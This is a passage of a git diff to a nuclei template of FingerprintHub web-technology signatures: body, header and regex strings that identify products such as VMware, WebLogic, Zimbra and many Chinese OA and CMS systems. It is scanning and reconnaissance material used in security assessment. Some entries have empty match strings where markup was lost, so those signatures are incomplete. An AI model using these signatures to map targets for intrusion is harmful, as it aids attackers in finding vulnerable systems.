Inc\.</a><br/>Your Cloud, Your Data, Your Way! - condition: or - part: body - - type: regex - name: hexo - regex: - - Powered by <a href="https?://hexo\.io/?"[^>]*>Hexo</ - condition: or - part: body - - type: regex - name: atlassian-bitbucket - regex: - - <li>Atlassian Bitbucket <span title="[a-z0-9]+" id="product-version" data-commitid="[a-z0-9]+" data-system-build-number="[a-z0-9]+"> v([\d.]+)< - condition: or - part: body - - type: regex - name: phppgadmin - regex: - - (?:<title>phpPgAdmin|phpPgAdmin) - condition: or - part: body - - type: regex - name: adnegah - regex: - - + - type: word name: veritas-netbackup words: - href="/opscenter/features/common/images/favicon.ico" + - type: word name: vertiv-system words: - var port = "9528 + - type: word part: header name: vertx words: - "Set-Cookie: vertx-web.session" + - type: word name: vhsoft-vhplot words: - /vhplot/webresource.axd + - type: word name: vicidial words: - url=/vicidial/welcome.php + - type: word name: victorysoft words: - value="style2012/style1/scripts/expressinstall.swf" + - type: word name: victorysoft words: - href="webstyles/webstyle1/style1/css.css" + - type: word name: victorysoft-performance-management-system words: - class="row fl-controls-left + - type: word name: victorysoft-performance-management-system words: - casui/themes/siam/login.css + - type: word name: videosoon words: - power by linksoon - videosoon + - type: word name: videosoon words: - href="skin/anysoondefault/anystyles.css + - type: word name: videosurveillancemanagementplatform words: - " 平台采用最新图像化展现技术" + - type: word name: viewgood-streammedia words: - fgetquery + - type: word name: viewgood-streammedia words: - viewgood + - type: word condition: and name: viewgood-streammedia words: - location.href - var webvirtualdiretory = 'viewgood'; + - type: word name: viewgood-streammedia words: - src='/viewgood/pc/ + - type: word name: violation-outreach-monitoring-system words: - + - type: word name: violation-outreach-monitoring-system words: - window.location='login.action'; + - type: word name: violation-outreach-monitoring-system words: - 欢迎登录违规外联平台 + - type: word name: virtualmin words: -
forgot your virtualmin password?
+ - type: word name: visualware-myconnection-server words: - + - type: word name: vmedia-multimedia-publishing-platform words: - function toggle(targetid) + - type: word name: vmedia-multimedia-publishing-platform words: - class="video_00" + - type: word name: vmware-esx words: - content="vmware esxi + - type: word name: vmware-esx words: - document.write("" + id_eesx_welcome + ""); + - type: word name: vmware-esx words: - + - type: word name: vmware-esx words: - 'content="vmware esx ' + - type: word name: vmware-esx words: - document.write(id_esx_viclientdesc); + - type: word name: vmware-esxi words: - ng-app="esxuiapp" + - type: word name: vmware-esxi words: - + - type: word name: vmware-horizon words: - href='https://www.vmware.com/go/viewclients' + - type: word name: vmware-horizon words: - alt="vmware horizon"> + - type: word name: vmware-server-2 words: - content="vmware server is virtual + - type: word name: vmware-vcenter words: - /converter/vmware-converter-client.exe + - type: word name: vmware-vcenter words: - content="vmware vcenter + - type: word name: vmware-vcenter words: - /vmw_nsx_logo-black-triangle-500w.png + - type: word name: vmware-virtualcenter words: - content="vmware virtualcenter + - type: word name: vmware-virtualcenter words: - content="vmware vsphere + - type: word name: vmware-virtualcenter words: - url=vcops-vsphere/ + - type: word name: vmware-virtualcenter words: - the vshield manager requires + - type: word name: vmware-vrealize words: - 正在重定向到 vrealize operations manager web + - type: word condition: and name: vmware-vrealize-operations-manager words: - Identity Manager - VMware + - type: word name: vmware-vsphere words: - <meta name="description" content="VMware vSphere + - type: word name: vmwareview words: - <title>VMware View Portal + - type: word name: vnc words: - 微信数字投票 - content="微平台投票管理系统 + - type: word name: vp-asp words: - + - type: word name: vp-asp words: - src="vs350.js + - type: word name: vp-asp words: - shopdisplayproducts.asp?id= + - type: word name: vpn358system words: - class="form-actions j_add_ip_actions" + - type: word name: vpn358system words: - href="/lib/bootstrap/ico/favicon.ico" + - type: word name: vrv-desktop-application-system words: - vrv + - type: word name: vrv-desktop-application-system words: - var vver = $('#hidverify').val(); + - type: word name: vrv-im words: -

连豆豆pc客户端

+ - type: word name: vrv-im words: - href="http://im.vrv.cn/server-securitycenter/password/goretrieval.vrv + - type: word name: vrv-im words: - class="loginusername" value="" placeholder="连豆豆账号/邮箱/手机号 + - type: word name: vrv-im words: - class="wj-text wj-title">下载信源豆豆

+ - type: word name: vrv-nac words: - id="modal_delay" + - type: word condition: and name: vrv-nac words: - localstorage.setitem('doctitle','北信源网络接入控制系统') - 欢迎登录北信源网络接入控制系统 + - type: word name: vts-cms words: - errmag + - type: word name: w7-officialaccounts words: - class="copyright">powered by 微擎 + - type: word condition: and name: w7-officialaccounts words: - content="微擎,微信 - onsubmit="return formcheck();" class="we7-form"> + - type: word name: w7-officialaccounts words: - powered by we7.cc + - type: word name: wacintaki-poteto-bbs words: - wacintaki + - type: word name: wacintaki-poteto-bbs words: - by ranmaguy and marcello + - type: word name: wackopicko words: -

welcome to wackopicko

+ - type: word name: wackopicko words: -

wackopicko.com

+ - type: word name: wantit-erp words: - /javascript/js/witfunctions.js + - type: word name: wap words: - window.location = 'wap.htm' + - type: word name: waspd words: - pending waspd activities + - type: word name: wat-system words: - 生产经营计划统计一体化管理信息系统安装程序 + - type: word name: waterssslvpn words: - welcome.cgi?p=logo&signinid=url_default + - type: word name: wavetop-days words: - application/views/img/logo_wavetop.png + - type: word name: wdlinux-wdcpsystem words: - href="http://www.wdlinux.cn/bbs/index.php + - type: word name: wdlinux-wdcpsystem words: - linux云主机 + - type: word part: header name: wdlinux-wdcpsystem words: - "Set-Cookie: wdcpsessionid" + - type: word condition: and name: we7 words: - 微擎 - w7.cc + - type: word name: weatimages words: - <a href="http://nazarkin.name/projects/weatimages + - type: word name: weatimages words: - <meta name="generator" content="weatimages"/> + - type: word name: weatimages words: - <div align="center" class="weatimages_toppest_navig" style="text-decoration:underline;"> + - type: word name: web-control-panel words: - <td><img src="/images/wcpe.gif + - type: word part: header name: web-crossing-server words: - "Server: web crossing" + - type: word name: web-data-administrator words: - - <form name="webform1" method="post" action="default.aspx" onsubmit="javascript:return webform_onsubmit();" id="webform1 + - <form name="webform1" method="post" action="default.aspx" onsubmit="javascript:return + webform_onsubmit();" id="webform1 + - type: word name: web-erp-network-system words: - window.location='/www/login.html' + - type: word name: web-wiz-rich-text-editor words: - <a href="http://www.richtexteditor.org" + - type: word name: web2project words: - </head><body>fatal error. you haven't created a config file yet.<br/><a href= + - type: word name: webalizer-log words: - <a href="http://www.webalizer.org + - type: word name: webalizer-log words: - <!-- generated by the webalizer ver + - type: word name: webalizer-log words: - <!-- webalizer version + - type: word name: webasyst-shop-script words: - <a href="http://www.shop-script.com + - type: word name: webasyst-shop-script words: - - 'powered by webasyst shop-script <a href="http://www.shop-script.com/" style="font-weight: normal">shopping cart software</a>' + - 'powered by webasyst shop-script <a href="http://www.shop-script.com/" style="font-weight: + normal">shopping cart software</a>' + - type: word name: webbased-pear-package-manager words: - pear_frontend_web + - type: word name: webbased-pear-package-manager words: - <img src="?img=pear" width="104" height="50" vspace="2" hspace="5" alt="pear"> + - type: word name: webbuilder words: - src="webbuilder/script/wb.js + - type: word name: webengine-site words: - href="/webengine/images/common.css + - type: word name: webengine-site words: - location.href = "/webengine/web/"; + - type: word name: webgrind words: - <span id="invocation_sum"></span> different functions called in <span id="runtime_sum + - type: word name: webid words: - powered by <a href="http://www.webidsupport.com/">webid + - type: word name: webid words: - <meta name="generator" content="webid"> + - type: word name: webissues words: - <div id="header-right">webissues + - type: word name: webissues words: - - <div><input type="hidden" name="__formid" id="field-login-__formid" value="login" /> + - <div><input type="hidden" name="__formid" id="field-login-__formid" value="login" + /> + - type: word name: weblogic words: - WebLogic + - type: word name: weblogic words: - Hypertext Transfer Protocol + - type: word name: weblogic words: - <i>Hypertext Transfer Protocol -- HTTP/1.1</i> + - type: word name: weblogic words: - /console/framework/skins/wlsconsole/images/login_WebLogic_branding.png + - type: word name: weblogic words: - Welcome to Weblogic Application Server + - type: word name: weblogic words: - Error 403-- + - type: word name: weblogic words: - Error 404--Not Found + - type: word name: weblogic words: - Oracle WebLogic Server + - type: word condition: and name: webmin words: - Webmin - session_login + - type: word name: webmin words: - webmin server on + - type: word name: webpa words: - <td align="right"><div id="inst_logo"><img src= + - type: word name: webray-situation-awareness words: - 'class="disclaimer" style="color: #ffffff">《盛邦安全网站监控预警平台服务协议》</a>' + - type: word name: websidestory words: - http://websidestory.com + - type: word name: websidestory words: - websidestory code + - type: word name: websidestory words: - websidestory,inc. all rights reserved. u.s.patent no. 6,393,479b1 + - type: word name: websidestory words: - <!-- websidestory html for search --> + - type: word condition: and name: websvn words: - WebSVN - subversion + - type: word name: webtrust-cert words: - https://cert.webtrust.org/viewseal + - type: word name: weiphp words: - 本系统由<a href="http://www.weiphp.cn" target="_blank">weiphp</a>强力驱动 + - type: word name: weiphp words: - content="weiphp + - type: word name: weiphp words: - /css/weiphp.css + - type: word name: weisha-learningsystem words: - /utility/corescripts/widget.js + - type: word name: wellcare-health-management-system words: - href="/web/vfyphrmedical">健康档案</a></li> + - type: word name: wellcare-health-management-system words: - www.wellcare.cn + - type: word part: header name: weonlydo-product words: - "Server: weonlydo" + - type: word part: header name: westell-secure words: - "Server: wstl cpe" + - type: word name: whatweb words: - - <body><center><table border=0><tr align=center><td><font color=red size=5>troy serial server</font></td></tr> + - <body><center><table border=0><tr align=center><td><font color=red size=5>troy + serial server</font></td></tr> + - type: word name: whatweb words: - - network card access password: </b><input type=password size=16 maxlength=16 name=access_psw> + - network card access password: </b><input type=password size=16 maxlength=16 + name=access_psw> + - type: word name: whfst-cms words: - 武汉富思特 + - type: word name: whir words: - css/css_whir.css + - type: word name: whir-ezoffice words: - ezofficeusername + - type: word name: whir-ezoffice words: - whirrootpath + - type: word name: whir-ezoffice words: - /defaultroot/js/cookie.js + - type: word name: whir-flexoffice words: - var flexofficepath="\/flexoffice" + - type: word name: whmcs words: - powered by <a href="http://www.whmcs.com + - type: word name: whmcs words: - - <div id="welcome_box">please <a href="clientarea.php" title="login"><strong>login</strong></a> or <a href="register.php" title="register"><strong>register</strong></a></div> + - <div id="welcome_box">please <a href="clientarea.php" title="login"><strong>login</strong></a> + or <a href="register.php" title="register"><strong>register</strong></a></div> + - type: word name: whtzjkj-erp words: - href="/content/home/tzjlog.ico" + - type: word name: wildfly-server words: - wildfly project + - type: word name: willfar-interface-management-tool words: - the wasion software foundation + - type: word name: willfar-interface-management-tool words: - alt="接口应用管理工具" + - type: word name: windows-business-server words: - src="images/sbslogo.gif + - type: word name: windows-business-server words: - href="/remote">remote web workplace + - type: word part: header name: windriver words: - "Server: windriver-webserver" + - type: word part: header name: wing-ftp-server words: - "Server: wing ftp server" + - type: word name: winiis-isp-access-resource-management-system words: - winisp.gif + - type: word name: winmail-server words: - amax information technologies inc. + - type: word name: winmail-server words: - "pop3,smtp server: <font color=red>" + - type: word name: winmail-server words: - src="themes/default/images/mail_pic.jpg + - type: word condition: and name: winmail-server words: - encryptpwd - sessid + - type: word condition: and name: winmail-server words: - f_theme - pwdplaceholder + - type: word name: winmail-server words: - winmail mail server + - type: word condition: and name: winmail-server words: - "(build " - background="customer/winmail_bg11.jpg + - type: word name: winmail-server words: - src="customer/index_winmail_new.gif + - type: word name: winwebmail words: - winwebmail server + - type: word name: winwebmail words: - images/owin.css + - type: word name: winwebmail words: - <td class=newsdiv-mid2>邮局管理员可自行分配邮箱!</td> + - type: word name: winwebmail words: - type="hidden" name="secex" + - type: word name: winwebmail words: - href="images\hwem.css" + - type: word name: wireless-access-point-controller words: - var oemproductname = "mvc_howay6000" + - type: word name: wireless-access-point-controller words: - <select id = "selclangswitch" class="langswitch" onchange = "switchpagelanguage()"> + - type: word name: wireless-access-point-controller words: - 苏州汉明科技有限公司 + - type: word name: wireless-access-point-controller words: - var oemproductname = "mvc_howay6100") + - type: word name: wireless-access-point-controller words: - src="images/acchtext.png" + - type: word name: wireless-access-point-controller words: - 版权所有 © 2009-2017</div> + - type: word name: wise-education-cloud-masters words: - ctl00_contentplaceholder1_dlttopvideos + - type: word name: wisepower-oa words: - action="/wisepower/login.jsp + - type: word name: wiserice-system words: - /resources/metronic/scripts/hz-tools.js + - type: word name: wiserice-system words: - <h4>请在下框里画图形来提交登录 + - type: word name: wishoa words: - WishOA_WebPlugin.js + - type: word name: wishoa words: - wishoa_webplugin.js + - type: word name: wosign-ssl-cert words: - https://seal.wosign.com/tws.js + - type: word name: wosign-ssl-cert words: - https://seal.wosign.com/signature + - type: word name: wowza-media-server words: - <html><head><title>wowza media server + - type: word part: header name: wowza-wowzastreamingengine words: - "Server: wowzastreamingengine" + - type: word name: wq-cms words: - powered by <a href='http://www.wqcms.com + - type: word name: wq-cms words: - inc/wqcms.js + - type: word name: wq-cms words: - style/wangqi/style.css + - type: word name: ws-server words: - websocket servers index.html + - type: word name: wsncm-iot words: - class="login">物联网供应链与金融风险管理服务 + - type: word name: wsncm-system words: - class="login">wsncm动态仓单系统 + - type: word part: header name: wso2-carbon-server words: - "Server: wso2 carbon server" + - type: word name: wstmart words: - powered by wstmart + - type: word name: wstmart words: - href="/wstmart/home/ + - type: word name: wuliupingtai words: - static/styles/frame/basic.css + - type: word name: wuzhicms words: - <meta name="generator" content="wuzhicms + - type: word condition: and name: wuzhicms words: - content="wuzhicms - powered by wuzhicms + - type: word name: wygk-product words: - href="wrzcnet.ico + - type: word name: wygk-product words: - <a href="mailto:webmaster@wrzc.net + - type: word name: wygk-product words: - url = 'wrzcnet_vote.asp?stype=view'; + - type: word name: xampp words: - 'font-size: 1.2em; color: red;">new xampp' + - type: word name: xampp words: - 'content="xampp ' + - type: word name: xbrother-monitor words: - if (!getcookie("x_gu_sid" + - type: word name: xcyg-system words: - ">digital anywhere platform</h2>" + - type: word name: xdcms words: - system/templates/xdcms/ + - type: word name: xdoa-oa words: - http://www.xdoa.cn</a> + - type: word name: xdoa-oa words: - 北京创信达科技有限公司 + - type: word condition: and name: xecure-vpn words: - xnstyle.css - xecure vpn manager + - type: word name: xecurevpn words: - xnstyle.css + - type: word name: xenapp words: - window.location="/citrix/xenapp" + - type: word name: xheditor words: - xheditor_lang/zh-cn.js + - type: word name: xheditor words: - class="xheditor + - type: word name: xheditor words: - .xheditor( + - type: word name: xhlis-oa words: - <title>杏和区域检验业务协同平台登录界面 + - type: word name: xiaomayi words: - /template/ant/css/anthomecomm.css + - type: word name: xiaonaodai words: - http://stat.xiaonaodai.com/stat.php + - type: word name: xinhaisoft-system words: - 北京心海导航教育科技股份有限公司-中国心理网版权所有
+ - type: word name: xinhaisoft-system words: - ../regist.asp?school= + - type: word name: xinnet-enterprise-mail words: - 北京新网数码信息技术有限公司 版权所有 + - type: word name: xinnet-mail words: - src="cgijson/getloginimg.php?img=logo + - type: word name: xinnet-mail words: - /webmail//cssv2/tamail.css + - type: word part: header name: xitami words: - "Server: xitami" + - type: word name: xiuno words: - xiuno/xiunobbs + - type: word name: xjhtqy-crm words: - class="hidden-xs ewheaderrow"> + - type: word name: xjhyt-system words: - class="wrap login_wrap" + - type: word name: xjhyt-system words: - url(images/yh.jpg) + - type: word name: xmall words: - xmadmin.exirck.cn + - type: word name: xoops words: - include/xoops.js + - type: word name: xpaper words: - src="template/paper/ + - type: word name: xtoa-oa words: - /app_qjuserinfo/qjuserinfoadd.jsp + - type: word name: xtoa-oa words: - /images/default/first/xtoa_logo.png + - type: word name: xtoa-oa words: - src="systemfiles/js/iawebclientactivexcheck.js" + - type: word name: xuanniao-traffic-management-platform words: - 玄鸟流量管理平台 + - type: word name: xunruicms words: - alt="xunruicms" + - type: word name: xxl-job words: - 分布式任务调度平台XXL-JOB + - type: word name: xycms words: - advfile/ad12.js + - type: word name: xyhcms words: - power by xyhcms + - type: word name: yabb words: - yabbtime.gettime() + - type: word name: yabb words: - /yabb.js + - type: word name: yadongsoft-fs3 words: - 神盾fs3文档安全共享系统v2.0 + - type: word condition: and name: yapi words: - YApi - 可视化接口管理平台 + - type: word name: yearning words: - id=subnet + - type: word name: yelala words: - /public/js/knockout-3.4.1.debug.js + - type: word name: yelala words: - - '' + - '' + - type: word name: yfidea-oa words: - background="oa/images/index/oalogin.jpg" + - type: word name: yichao-crmreporting words: - href="/css/vendors~index.acfeb.css" + - type: word name: yichao-system words: - src="amy/webos/jpmanager.js" + - type: word name: yii-framework words: - get started with yii + - type: word name: yioks-campus-football-management-platform words: - + - type: word name: yiqi-cms words: - content="yiqicms + - type: word name: yirui-iras words: - /authjsp/login.jsp + - type: word name: yirui-iras words: - fe0174bb-f093-42af-ab20-7ec621d10488 + - type: word condition: and name: yiyu-opms words: - opms - opms管理系统,织蝶-企业应用系统为您的企业保驾护航 + - type: word name: yizhitong-e7 words: - name="hidden_isbiaozhun" + - type: word name: ymail-optical-content-reading words: - /ymail/default/js/menu.js + - type: word name: ymhome-oa words: - /yimioa.apk + - type: word - name: yongyou-ism + name: yonyou-ism words: - sheight*window.screen.deviceydpi + - type: word name: yonyou-erp words: - login_main_bg + - type: word name: yonyou-erp words: - login_owner + - type: word name: yonyou-erp-nc words: - /nc/servlet/nc.ui.iufo.login.index + - type: word condition: and name: yonyou-fe words: - v_hedden - v_show + - type: word name: yonyou-grp-u8 words: - window.location.replace("login.jsp?up=1") + - type: word name: yonyou-intelligentplant words: - /modules/core/client/views/sidemenu.client.view.html + - type: word name: yonyou-ksoa words: - onmouseout="this.classname='btn btnoff'" + - type: word name: yonyou-rmis words: - href="clientfile/rmisupdate.exe + - type: word name: yonyou-seeyon-oa words: - /seeyon/USER-DATA/IMAGES/LOGIN/login.gif + - type: word name: yonyou-seeyon-oa words: - /seeyon/common/ + - type: word name: yonyou-seeyon-oa words: - M3 Server + - type: word name: yonyou-seeyon-oa words: - M1-Server + - type: word name: yonyou-seeyon-oa words: - /seeyon/user-data/images/login/login.gif + - type: word condition: and name: yonyou-seeyon-oa words: - seeyon - seeyonproductid + - type: word name: yonyou-seeyon-oa words: - var _ctxpath = '/seeyon' + - type: word name: yonyou-seeyon-oa words: - a8-v5企业版 + - type: word name: yonyou-seeyon-oa words: - /seeyon/ + - type: word name: yonyou-shop words: - url:"/shophome/ajaxgetcompetemessagelist.action", + - type: word name: yonyou-shop words: - $.post("/shopfront/shoppingcar/gotoshoppingcartajax.action",function(data){ + - type: word name: yonyou-shop words: - 北京用友政务软件股份有限公司 + - type: word name: yonyou-turbocrm words: - turboui.js + - type: word name: yonyou-u8 words: - getfirstu8accid + - type: word name: yonyou-u8-cloud words: - 开启u8 cloud云端之旅 + - type: word name: yonyou-uclient words: - http-equiv=refresh content=0;url=index.jsp + - type: word name: yonyou-ufida words: - /system/login/login.asp?appid= + - type: word condition: and name: yonyou-ufida-nc words: - ufida_iufo_over.png - ufida_nc.png + - type: word condition: and name: yonyou-ufida-nc words: - logo/images/ - ufida + - type: word name: yonyou-ufida-nc words: - logo/images/ufida_nc.png + - type: word name: yonyou-ufida-nc words: -
+ - type: word name: yonyou-ufida-nc words: -
驭龙 + - type: word name: yulong-hids words: -

yulong - a cool hids system.

+ - type: word name: yunanbao-yunxz words: - - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: 0px"' + - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: + 0px"' + - type: word name: yuneasy-ipcalling words: - 云翌ip呼叫中心 + - type: word name: yunec words: - href="/17rec.html" + - type: word name: yunhezi words: - ui/js/seaconfig.js + - type: word name: yunhezi words: - ui/skins/black/style.css + - type: word name: yunhezi words: - class="client-list dm-clear"> + - type: word name: yunkemail words: - action="/alimail/error/browserlog + - type: word name: yunkemail words: - content="阿里企业邮箱 + - type: word name: yunsuo words: - href="http://bbs.yunsuo.com.cn + - type: word name: yunsuo words: - + - type: word name: zhongshengsoft-crm words: - clientutil.isff=!clientutil.isie + - type: word name: zhongshengsoft-crm words: - alert("餐厅编号不能为空") + - type: word name: zhongtan-ndstart words: - var pubnewsarray + - type: word name: zhongtan-ndstart words: - "南大之星信息发布系统 " + - type: word name: zhongyou-system words: - background=zhongyou.jpg + - type: word name: zhongyou-system words: - 众友科技巡检管理软件 + - type: word name: zhu-ji-bao words: - 您访问的是主机宝服务器默认页 + - type: word name: zhu-ji-bao words: - <a href="http://z.admin5.com/" target= + - type: word name: zhuofansoft-cms words: - session.infocss.infocssurl + - type: word name: zidesoft-e6 words: - src="/static/images/login/btn-login.gif" + - type: word name: ziguanghuayu-attendance-management-system words: - 广州紫光华宇信息技术有限公司 + - type: word name: zimbra words: - ImgZimbraIcon + - type: word part: header name: zimbra words: - "Set-Cookie: ZM_LOGIN_CSRF" + - type: word name: zimbra words: - window._zimbramail + - type: word name: zimbra words: - content="zimbra + - type: word name: zipkin words: - <base href="/zipkin/"> + - type: word name: zizhujianzhan words: - content="模板系统xinnet + - type: word name: zizhujianzhan words: - href="msnim:chat?contact=xinnet@hotmail.com + - type: word name: zknet-attendance-management words: - 'onclick="showstate(gettext(''forgotten password'')) ' + - type: word condition: and name: zknet-attendance-management words: - zknet - zksoftware inc. + - type: word name: zknet-attendance-management words: - web考勤管理系统 + - type: word condition: and name: zkteco-security-management-system words: - src='/login/images/zksecurity.png' - 百傲瑞达 + - type: word condition: and name: zkteco-security-management-system words: - class="login-finger-btn disabled" - id="password_hidden" + - type: word name: zkteco-security-management-system words: - - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. all rights reserved"); + - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. + all rights reserved"); + - type: word name: zkteco-system words: - class="m-btn zkgreen rnd" + - type: word name: zkwell-corrosion-monitoring-and-corrosion-protection-management-system words: - background-image:url(images/devicebg.jpg) + - type: word name: znv-digital-campus words: - list.asp?caseid= + - type: word name: zoneminder words: - zoneminder login + - type: word name: zonghousc-system words: - data-errormessage-value-missing="* 请录入用户名 + - type: word name: zonghousc-system words: - style/default/frui.css + - type: word name: zoom-search-engine words: - name="zoom_query" + - type: word name: zoommeeting words: - class="alert alert-success hideme zoom-newmessage" + - type: word part: header name: zope words: - "X-Powered-By: zope" + - type: word condition: and name: zotonic words: - /lib/js/apps/zotonic-1.0 - "powered by: zotonic" + - type: word name: zte-police-research-system words: - 深圳市中兴信息技术有限公司版权所有 + - type: word name: zte-police-research-system words: - src="img/gonanlogo.jpg + - type: word name: zuitu words: - help/zuitu.php + - type: word name: zxoa words: - obj.src = "createcheckcode.aspx?id"+strmath; + - type: word name: zxoa words: - - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" class="loginbtn" /> + - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" + class="loginbtn" /> + - type: word name: zzcms words: - /inc/showuserlogin.php?style=h&t=math.random() + - type: word name: zzsmit-public-bicycle-management-system words: - href="/skins/bicycle/css/login.css" + - type: word name: zzzcms words: - Powered by <a href='http://zzzcms.com'>ZZZcms</a> + +# Enhanced by cs on 2022/02/08 diff --git a/poc/web/fingerprinthub-web-fingerprints.yaml b/poc/web/fingerprinthub-web-fingerprints.yaml index 3b88232ca7..a86dd3554b 100644 --- a/poc/web/fingerprinthub-web-fingerprints.yaml +++ b/poc/web/fingerprinthub-web-fingerprints.yaml @@ -1,68 +1,54 @@ id: fingerprinthub-web-fingerprints - info: name: FingerprintHub Technology Fingerprint - author: pdteam,righettod + author: pdteam severity: info description: FingerprintHub Technology Fingerprint tests run in nuclei. reference: - https://github.com/0x727/FingerprintHub classification: cwe-id: CWE-200 - metadata: - max-request: 1 tags: tech - -http: +requests: - method: GET path: - "{{BaseURL}}" - - host-redirects: true + redirects: true max-redirects: 2 - matchers-condition: or matchers: - type: word name: 08cms words: - typeof(_08cms) - - type: word name: 1caitong words: - /custom/groupnewslist.aspx?groupid= - - type: word name: 21grid words: - 技术支持:网格(福建)智能科技有限公司 - - type: word name: 263-enterprise-mailbox words: - net263.wm.custom_login.homepage_init - - type: word name: 263-enterprise-mailbox words: - src="/custom_login/js/net263_wm_util.js - - type: word name: 263-hrm words: - <p align="center">请使用263em登陆!</p> - - type: word name: 263-meeting words: - <frame src="/jsp/conference/meetinglist.jsp" name="mainframe"/> - - type: word name: 315soft-filesystem words: - ">多可电子档案管理系统</div" - - type: word condition: and name: 35mail @@ -70,1885 +56,1513 @@ http: - "35" - images/mail/35pushmail.app.png - switchingserverpopup - - type: word name: 35mail words: - class="user_define_img_btn6" href="http://help.mail.35.com/mailman/81.html - - type: word condition: and name: 360-enterprise-security words: - 360entinst - 关于全网部署360私有云的通知 - - type: word name: 360-enterprise-security words: - 天擎 - - type: word name: 360-tianji words: - src="/resource/img/login/logo_403.png" alt="360天机"/></a> - - type: word name: 360-tianqing words: - appid":"skylar6 - - type: word name: 360-tianqing words: - /task/index/detail?id={item.id} - - type: word name: 360-tianqing words: - 已过期或者未授权,购买请联系4008-136-360 - - type: word name: 360-webscan words: - webscan.360.cn/status/pai/hash - - type: word name: 365webcall words: - src='http://www.365webcall.com/imme1.aspx? - - type: word name: 365xxy-examing words: - href=https://unpkg.com/element-ui/lib/theme-chalk/index.css - - type: word name: 365xxy-examing words: - <title>云时政在线考试系统 - - type: word name: 3dcart words: - powered by 3dcart - - type: word part: header name: 3dcart words: - "X-Powered-By: 3dcart" - - type: word name: 3kits-cms words: - 3kits - - type: word name: 3kits-cms words: - href="http://www.3kits.com" - - type: word condition: and name: 42gears-suremdm words: - astrocontacts - suremdm - - type: word condition: and name: 53kf words: - chat.53kf.com/company.php - chat.53kf.com/kf.php - - type: word name: 53kf words: - powered by 53kf - - type: word name: 53kf words: - tb.53kf.com/code/ - - type: word name: 54-customer-service words: - src="http://code.54kefu.net/ - - type: word name: 5ikq words: - content="我爱考勤云平台 - - type: word name: 5ikq words: - 我爱考勤云平台 - - type: word name: 5k-crm words: - /public/js/5kcrm.js - - type: word name: 5vtechnologies-blueangelsoftwaresuite words: - /cgi-bin/webctrl.cgi?action=index_page - - type: word name: 6kbbs words: - powered by 6kbbs - - type: word name: 6kbbs words: - generator" content="6kbbs - - type: word name: 74cms words: - content="74cms.com" - - type: word name: 74cms words: - content="74cms.com - - type: word name: 74cms words: - content="骑士cms - - type: word name: 74cms words: - powered by 78OA办公系统 - - type: word name: 78oa words: - /resource/javascript/system/runtime.min.js - - type: word name: 78oa words: - license.78oa.com - - type: word name: 7moor-product words: - class="ds_do_action domain_aboutus" - - type: word name: 7moor-product words: - /javascripts/qiniu/qiniu.js - - type: word part: header name: a2b-webserver words: - "Server: a2b webserver" - - type: word name: aakuan-attendance-system words: - href="scripts/popmodal.css" - - type: word name: aakuan-attendance-system words: - aakuan.cn - - type: word name: aardvark-topsites words: - aardvark topsites - - type: word name: accellion-secure-file-transfer words: - secured by accellion - - type: word name: account-manager-exhibition-system words: - action="/system/login/login.shtml - - type: word name: achecker-web-accessibility-evaluation-tool words: - content="achecker is a web accessibility - - type: word name: acsoft-cloud words: - sdiyun.com, all rights reserved - - type: word name: acsoft-cloud words: - onrememberpasswordclick - - type: word condition: and name: acsoft-reimbursement-system words: -
location.href="ucenter"; - - type: word name: activecollab words: - powered by activecollab - - type: word name: activecollab words: -

- Acunetix - - type: word name: adaptec-maxview words: - action="/maxview/manager/login.xhtml - - type: word name: adimoney words: - <img src="/img/logo.png" alt="adimoney"/> - - type: word name: adimoney words: - 'content="adimoney.com mobile advertisement network. ' - - type: word name: adiscon-loganalyzer words: - adiscon gmbh - - type: word name: adminer words: - https://www.adminer.org - - type: word name: adobe-coldfusion words: - /cfajax/ - - type: word name: adobe-coldfusion words: - <cfscript> - - type: word name: adobe-connect words: - /common/scripts/showcontent.js - - type: word name: adobe-cq5 words: - _jcr_content - - type: word name: adobe-experience-manager words: - adobe experience manager - - type: word name: adobe-experience-manager words: - ' class="coral-heading coral-heading--1"' - - type: word name: adobe-flex words: - adobe flex - - type: word name: adobe-flex words: - learn more about flex at http://flex.org - - type: word name: adobe-golive words: - generator" content="adobe golive - - type: word name: adobe-magento words: - /skin/frontend/ - - type: word name: adobe-magento words: - blank_img - - type: word name: adobe-robohelp words: - generator" content="adobe robohelp - - type: word name: adt-iam words: - content="tpn,vpn,内网安全,内网控制,主机防护" - - type: word name: advanced-electron-forum words: - powered by aef - - type: word name: advantech-webaccess words: - /bw_templete1.dwt - - type: word name: advantech-webaccess words: - /broadweb/webaccessclientsetup.exe - - type: word name: advantech-webaccess words: - /broadweb/bwuconfig.asp - - type: word name: advantech_wise words: - remote manage your intelligent systems - - type: word name: adviserlogiccli words: - navigator.serviceworker.register('/adviserlogiccache.js') - - type: word name: afterlogic-webmail words: - afterlogic webmail pro - - type: word name: agilebpm words: - class="logo-element">agile-bpm - - type: word name: agilebpm words: - class="logo-element">bpm - - type: word condition: and name: agoracgi words: - /agora.cgi?product= - /store/agora.cgi - - type: word name: ahnlab-trusguard-ssl-vpn words: - trusguard ssl vpn client - - type: word name: aidex words: - http://www.aidex.de/ - - type: word name: aisino-telecom words: - <font class="bottomfont">航天信息股份有限公司 电信行业版 - - type: word condition: and name: ajenti-server-admin-panel words: - action="/ajenti:auth" - src="/ajenti:static/ - - type: word name: akiva-webboard words: - powered by webboard - - type: word name: alcasar words: - valoriserdiv5 - - type: word name: alcatel_lucent-omnivista-cirrus words: - /help/en-us/others/ov-cirrus_cookiepolicy.html - - type: word name: ali-monitoring-system words: - /monitor/css/monitor.css - - type: word name: ali-monitoring-system words: - href="/monitor/monitoritem/monitoritemlist.htm - - type: word name: alibaba-group-dms words: - copyright © dms all rights reserved (alibaba 数据管理产品) - - type: word name: alibaba-group-tlog words: - content="tlog 实时数据处理 - - type: word name: aliyun-rds words: - class="legend">rds管理系统</div> - - type: word name: aliyuncdn words: - cdn.aliyuncs.com - - type: word part: header name: aliyunoss words: - "Server: aliyunoss" - - type: word name: alliance-web-platform words: - window.location = "/swp/group/admin"; - - type: word name: alstom-system words: - href="technology_communion.asp - - type: word name: am-websystem words: - id="dvlogo" - - type: word name: amaze-ui words: - amazeui.min.js - - type: word name: amaze-ui words: - amazeui.js - - type: word name: amaze-ui words: - amazeui.css - - type: word name: ambuf-onlineexam words: - 北京众恒志信科技 - - type: word name: 